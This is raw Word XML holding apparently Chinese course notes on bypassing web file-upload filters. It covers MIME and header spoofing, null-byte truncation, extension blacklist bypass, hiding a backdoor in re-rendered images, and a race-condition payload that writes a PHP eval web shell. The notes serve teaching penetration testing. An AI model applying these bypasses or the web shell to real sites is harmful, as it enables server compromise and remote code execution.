        <w:t>Content-Type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image/png</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、文件头判断</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>GIF89a</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无递归，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>pphphp</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系统大小写敏感属性</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lastRenderedPageBreak/>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、低版本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>GET-%00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>截断</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>自动解码一次</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/var/www/html/upload/x.php%00</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8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、低版本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>POST-%00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>截断</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手工解码一次</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">../upload/x.php%00 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>二次解码</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9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、黑名单</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过滤不严</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>php3</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10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、逻辑不严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条件竞争</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;?php fputs(fopen('xiao.php','w'),'&lt;?php eval($_REQUEST[1]);?&gt;');?&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>上传不断发包</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请求不断发包</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11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、二次渲染</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>先搞个正常图片，上传导出渲染后的图片</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对比保留部分，在保留部分添加后门代码</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最后利用提示的文件包含执行图片后门代码</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11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、函数缺陷</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>move_uploaded_file 1.php/.</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12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、代码审计</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数组绕过</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-----------------------------174283082921961</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Content-Disposition: form-data; name="save_name[0]"</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http://2.php/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-----------------------------174283082921961</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Content-Disposition: form-data; name="save_name[2]"</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gif</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实战遇到的情况：</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、执行权限</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文件上传后存储目录不给执行权限</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>绕过条件：能控制上传文件存储目录</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、解码还原</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据做存储，解析固定（文件后缀名无关）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文件上传后利用编码传输解码还原</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>绕过：无法直接绕过</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、分站存储</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">upload.xiaodi8.com </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>上传</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">images.xiaodi8.com </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>存储</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>绕过：看存储的执行策略</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OSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>控制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-OSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象存储</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-Bucket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>绕过：无法直接绕过</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应用场景：</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、注册用户上传地方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接口的代码</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、后台或其他管理页面</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、源码泄露或盲测文件</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>5</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三方编辑器上传漏洞</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>6</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特定的源码审计漏洞</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中构造上传页面</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>后续课程讲演示以上应用场景</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </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复盘报告</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报告案例说明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFCD2FC" w14:textId="77777777" w:rsidR="0012212F" w:rsidRDefault="0012212F" w:rsidP="0012212F">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7" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
            <w:color w:val="1E6FFF"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>资源下载地址</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5736E549" w14:textId="77777777" w:rsidR="0012212F" w:rsidRDefault="0012212F" w:rsidP="0012212F">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="60" w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DDDB15" w14:textId="77777777" w:rsidR="00D41CA4" w:rsidRDefault="00D41CA4"/>
    <w:sectPr w:rsidR="00D4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5ED"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9CDAC1A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C3"/>
    <w:rsid w:val="0012212F"/>
    <w:rsid w:val="002923C3"/>
    <w:rsid w:val="00D4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F69C0-80BB-4FFE-B658-03BC4467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12212F"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTML">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="HTML0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00122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212F"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTML1">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0012212F"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a3">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00122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7553">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1028918474">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="7834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qq.com/doc/DQ3Z6RkNpaUtMc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2025-03-29T06:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-29T06:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>